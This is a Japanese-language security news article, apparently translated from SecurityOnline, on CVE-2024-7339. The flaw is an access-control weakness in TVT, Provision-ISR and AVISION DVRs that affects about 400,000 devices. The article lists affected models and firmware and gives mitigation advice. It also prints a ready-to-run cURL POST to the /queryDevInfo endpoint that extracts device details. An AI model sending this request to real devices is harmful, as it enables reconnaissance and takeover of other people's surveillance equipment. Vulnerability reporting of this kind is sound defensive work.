Digital Video Recorder デバイス群の脆弱性 CVE-2024-7339:40万台が危険な状態

CVE-2024-7339: DVR Vulnerability Exposes Over 400,000 Devices to Hackers

2024/08/01 SecurityOnline — TVT/Provision-ISR/AVISION などのモデルを含む、幅広い人気を誇る DVR (Digital Video Recorder) デバイス群で、脆弱性 CVE-2024-7339 が発見された。この脆弱性により、408,035台ものデバイスが、不正アクセスや悪用の可能性にさらされることになる。


この脆弱性は、デバイス群の Web サーバに存在し、不十分なアクセス・コントロールに起因するものである。そのため、悪用に成功した攻撃者は、ハードウェアやソフトウェアのバージョン/シリアル番号/ネットワーク設定などの機密情報を、リモートから抜き取ることが可能になる。さらに、この窃取したデータを武器に、以下のような攻撃を仕掛けることも可能になる:

  • 標的型侵入: デバイスの詳細なコンフィグ情報を得ることで、最大限の効果を発揮するよう、攻撃を調整できる。
  • デバイスの乗っ取り: 暴露された脆弱性を利用して、目的を絞り込んだ DVR の制御を可能にする。
  • データ侵害: DVR に保存されている、画像などの機密データへのアクセスを可能性にする。

以下の DVR モデルを所有/管理している場合において、また、ソフトウェア・バージョンを使用している場合において、そのデバイスは脆弱である:

  • ハードウェア: TVT DVR (TD-2104TS-CL, TD-2108TS-HP)/Provision-ISR DVR (SH-4050A5-5L(MM))/AVISION DVR (AV108T) など。
  • ソフトウェア: 1.3.4.22966B181219.D00.U1(4A21S)/1.3.4.22966B181219.D14.U1(8A41T)/1.3.4.22966B181219.D44.U1(16A82T)/1. 3.4.24513B190218.D00.U1(8A21S)/1.3.3.20657B180918.D06.U2(4A41T)/1.3.4.24879B190222.D00.U2(8A21S)

この攻撃プロセスは単純であり、脆弱なエンドポイントへのシンプルな POST リクエストを取り込んだ、以下の cURL コマンドを使用してデバイス情報を抽出できる:

curl -X POST 
"http://<TARGET_IP>/queryDevInfo" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \
-H "Upgrade-Insecure-Requests: 1" \
-H "Connection: keep-alive" \
-H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari" \
-H "Content-Length: 103" \
-d '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" 
clientType="WEB"/>'

このコマンドにより、細工された XML リクエストがターゲットの DVR に送信され、そのデバイスは機密情報を返す。

何ができるのだろう?
  • アップデートを確認する:CVE-2024-7339 に対応するパッチ、または、ファームウェアのアップデートの利用について確認するために、直ちに DVR メーカー/ベンダーに連絡する。アップデートが取得できた場合には、速やかに適用する。
  • アクセスの制限: 厳格なアクセス制御と認証メカニズムを導入して、デバイス・インターフェイスへのアクセスを管理する。
  • ネットワークの保護: ファイアウォールや強固なパスワードといった、強化されたネットワーク・セキュリティ対策を実施し、デバイスへの不正アクセスを制限する。
  • 不審な行動の監視: DVR のログを注意深く監視し、異常な動作などの懸念事項が発見された場合には、セキュリティ・チームまたはメーカーに報告する。

この記事を読む限り、DVR (Digital Video Recorder) という言葉は、このマーケットの総称であり、そこから提供される複数の製品に、共通の脆弱性が発見されたと言っているように捉えられます。ソフトウェアのサプライチェーンから生じているのでしょう。ご利用の方は、十分に お気をつけください。